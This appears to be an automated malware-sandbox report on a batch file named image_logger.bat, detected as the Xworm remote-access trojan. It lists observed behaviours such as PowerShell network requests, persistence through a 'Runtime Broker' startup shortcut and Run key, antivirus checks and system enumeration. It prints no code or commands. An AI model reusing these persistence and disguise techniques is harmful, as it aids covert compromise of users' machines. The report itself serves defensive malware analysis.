Analysis Overview
SHA256
7905527e602b2147d25e7d1698c70a408bd0d94aa539f347e41c070e157feee0
Threat Level: Known bad
The file image_logger.bat was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Modifies firewall policy service
Modifies security service
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Drops startup file
Checks computer location settings
Checks for any installed AV software in registry
Adds Run key to start application
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Enumerates system info in registry
Modifies registry class
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Checks SCSI registry key(s)
Delays execution with timeout.exe
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Modifies data under HKEY_USERS
Checks processor information in registry
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-31 17:11
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-31 17:11
Reported
2024-05-31 17:53
Platform
win10v2004-20240226-en
Max time kernel
1797s
Max time network
1802s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{38A70F3A-E4BC-4B78-9A8F-604142130FC2} = "v2.30|Action=Allow|Active=TRUE|Dir=In|Protocol=6|LPort2_10=4381-4390|App=C:\\Program Files\\WindowsApps\\SpotifyAB.SpotifyMusic_1.238.720.0_x64__zpdnekdrzrea0\\Spotify.exe|Name=Spotify Music|Desc=Spotify Music|EmbedCtxt={78E1CD88-49E3-476E-B926-580E596AD309}|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{A5809AB4-1447-424D-A7F5-E02A6799CC4B} = "v2.30|Action=Allow|Active=TRUE|Dir=In|Protocol=6|LPort2_10=8080-8082|App=C:\\Program Files\\WindowsApps\\SpotifyAB.SpotifyMusic_1.238.720.0_x64__zpdnekdrzrea0\\Spotify.exe|Name=Spotify Music|Desc=Spotify Music|EmbedCtxt={78E1CD88-49E3-476E-B926-580E596AD309}|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{EFA79DB4-4312-4D5C-B0C6-538EED48690E} = "v2.30|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=57621|App=C:\\Program Files\\WindowsApps\\SpotifyAB.SpotifyMusic_1.238.720.0_x64__zpdnekdrzrea0\\Spotify.exe|Name=Spotify Music|Desc=Spotify Music|EmbedCtxt={78E1CD88-49E3-476E-B926-580E596AD309}|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{95CD1AC0-CDAF-4956-B88B-05BAAAD8E545} = "v2.30|Action=Allow|Active=TRUE|Dir=In|Protocol=6|LPort2_10=4371-4379|App=C:\\Program Files\\WindowsApps\\SpotifyAB.SpotifyMusic_1.238.720.0_x64__zpdnekdrzrea0\\Spotify.exe|Name=Spotify Music|Desc=Spotify Music|EmbedCtxt={78E1CD88-49E3-476E-B926-580E596AD309}|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{84C5AF36-9E0F-497A-952D-53D6E57A47FA} = "v2.30|Action=Allow|Active=TRUE|Dir=In|Protocol=17|LPort=8088|App=C:\\Program Files\\WindowsApps\\SpotifyAB.SpotifyMusic_1.238.720.0_x64__zpdnekdrzrea0\\Spotify.exe|Name=Spotify Music|Desc=Spotify Music|EmbedCtxt={78E1CD88-49E3-476E-B926-580E596AD309}|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{4803A624-CA39-4792-AC8C-A82A5B19A041} = "v2.30|Action=Allow|Active=TRUE|Dir=Out|Protocol=17|App=C:\\Program Files\\WindowsApps\\SpotifyAB.SpotifyMusic_1.238.720.0_x64__zpdnekdrzrea0\\Spotify.exe|Name=Spotify Music|Desc=Spotify Music|EmbedCtxt={78E1CD88-49E3-476E-B926-580E596AD309}|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules\{4622DBAA-312D-4177-9FBA-334E1F834462} = "v2.30|Action=Block|Active=TRUE|Dir=In|Name=Spotify Music|Desc=Spotify Music|LUOwn=S-1-5-21-3808065738-1666277613-1125846146-1000|AppPkgId=S-1-15-2-557819504-3144503769-3460048582-2468406004-2969798954-3397036932-4166026031|EmbedCtxt=Spotify Music|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{382DAE2E-0E76-434A-8E9C-F0D8B5D05677} = "v2.30|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=Spotify Music|Desc=Spotify Music|LUOwn=S-1-5-21-3808065738-1666277613-1125846146-1000|AppPkgId=S-1-15-2-557819504-3144503769-3460048582-2468406004-2969798954-3397036932-4166026031|EmbedCtxt=Spotify Music|Platform=2:6:2|Platform2=GTEQ|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{B0BFDC9B-A232-4C17-9BBC-AA19585CC19E} = "v2.30|Action=Allow|Active=TRUE|Dir=In|Protocol=6|LPort=8443|App=C:\\Program Files\\WindowsApps\\SpotifyAB.SpotifyMusic_1.238.720.0_x64__zpdnekdrzrea0\\Spotify.exe|Name=Spotify Music|Desc=Spotify Music|EmbedCtxt={78E1CD88-49E3-476E-B926-580E596AD309}|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{9A27FC89-1236-48D3-BE87-557BD3010D42} = "v2.30|Action=Allow|Active=TRUE|Dir=In|Protocol=6|LPort=8088|App=C:\\Program Files\\WindowsApps\\SpotifyAB.SpotifyMusic_1.238.720.0_x64__zpdnekdrzrea0\\Spotify.exe|Name=Spotify Music|Desc=Spotify Music|EmbedCtxt={78E1CD88-49E3-476E-B926-580E596AD309}|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{DAC0E786-DA8B-4FE8-882C-D20E3363D755} = "v2.30|Action=Allow|Active=TRUE|Dir=In|Protocol=6|LPort2_10=57621-57631|App=C:\\Program Files\\WindowsApps\\SpotifyAB.SpotifyMusic_1.238.720.0_x64__zpdnekdrzrea0\\Spotify.exe|Name=Spotify Music|Desc=Spotify Music|EmbedCtxt={78E1CD88-49E3-476E-B926-580E596AD309}|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{F8F32B69-5F31-4CD4-974E-C15B217713BA} = "v2.30|Action=Allow|Active=TRUE|Dir=Out|Protocol=6|App=C:\\Program Files\\WindowsApps\\SpotifyAB.SpotifyMusic_1.238.720.0_x64__zpdnekdrzrea0\\Spotify.exe|Name=Spotify Music|Desc=Spotify Music|EmbedCtxt={78E1CD88-49E3-476E-B926-580E596AD309}|" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules\{ED4FF9B6-19FD-4408-A6CA-A6636FA472CC} = "v2.30|Action=Block|Active=TRUE|Dir=Out|Name=Spotify Music|Desc=Spotify Music|LUOwn=S-1-5-21-3808065738-1666277613-1125846146-1000|AppPkgId=S-1-15-2-557819504-3144503769-3460048582-2468406004-2969798954-3397036932-4166026031|EmbedCtxt=Spotify Music|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules\{E66ABA8D-A38E-489B-8051-F942FE179672} = "v2.30|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=Spotify Music|Desc=Spotify Music|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-3808065738-1666277613-1125846146-1000|AppPkgId=S-1-15-2-557819504-3144503769-3460048582-2468406004-2969798954-3397036932-4166026031|EmbedCtxt=Spotify Music|" | C:\Windows\system32\svchost.exe | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs\S-1-15-2-557819504-3144503769-3460048582-2468406004-2969798954-3397036932-4166026031S-1-5-21-3808065738-1666277613-1125846146-1000 = "v2.30|AppPkgId=S-1-15-2-557819504-3144503769-3460048582-2468406004-2969798954-3397036932-4166026031|LUOwn=S-1-5-21-3808065738-1666277613-1125846146-1000|C=S-1-15-3-1|C=S-1-15-3-557819504-3144503769-3460048582-2468406004-2969798954-3397036932-4166026031|M=spotifyab.spotifymusic_zpdnekdrzrea0|Name=Spotify Music|Desc=Spotify Music|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs\S-1-15-2-557819504-3144503769-3460048582-2468406004-2969798954-3397036932-4166026031S-1-5-21-3808065738-1666277613-1125846146-1000 = "v2.30|AppPkgId=S-1-15-2-557819504-3144503769-3460048582-2468406004-2969798954-3397036932-4166026031|LUOwn=S-1-5-21-3808065738-1666277613-1125846146-1000|C=S-1-15-3-1|C=S-1-15-3-557819504-3144503769-3460048582-2468406004-2969798954-3397036932-4166026031|M=spotifyab.spotifymusic_zpdnekdrzrea0|Name=Spotify Music|Desc=Spotify Music|D=C:\\Program Files\\WindowsApps\\SpotifyAB.SpotifyMusic_1.238.720.0_x64__zpdnekdrzrea0\\|PFN=SpotifyAB.SpotifyMusic_1.238.720.0_x64__zpdnekdrzrea0|" | C:\Windows\system32\svchost.exe | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Runtime Broker = "C:\\Users\\Public\\Runtime Broker.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks for any installed AV software in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avast Software\Avast | C:\Windows\system32\svchost.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Bits-Client%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WinRM%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | C:\Windows\system32\svchost.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SoftwareDistribution\Download\4fc661cc8878223712c18124f63a67cb\BlockMap.xml | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\SoftwareDistribution\SLS\2B81F1BF-356C-4FA1-90F1-7581A62C6764\sls.cab | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\SLS\2B81F1BF-356C-4FA1-90F1-7581A62C6764\TMP2C2E.tmp | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\SLS\9482F4B4-E343-43B6-B170-9A65BC822C77\sls.cab | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\SoftwareDistribution\Download\aa1e73f47f2fd04b51fc5324f663033c\BlockMap.xml | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\SoftwareDistribution\Download\929ae566f1f233c13a3bbf347b449657\BlockMap.xml | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\SLS\9482F4B4-E343-43B6-B170-9A65BC822C77\TMP4E2E.tmp | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\SLS\855E8A7C-ECB4-4CA3-B045-1DFA50104289\sls.cab | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\SoftwareDistribution\Download\b38597ddf936e9cb72180a70de5f06a3\BlockMap.xml | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edbtmp.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\SLS\855E8A7C-ECB4-4CA3-B045-1DFA50104289\TMP5091.tmp | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\SoftwareDistribution\DataStore\Logs\tmp.edb | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\SoftwareDistribution\Download\9daa50bb873acacf7c3bddfd29b3041e\BlockMap.xml | C:\Windows\system32\svchost.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0012 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\001C | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0025 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0025 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0025 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0025 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\001B | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0012 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\001B | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0012 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\CompatibleIDs | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\001C | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\001B | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0012 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\001C | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\001C | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\001B | C:\Windows\system32\svchost.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\svchost.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct | C:\Windows\system32\svchost.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\svchost.exe | N/A |
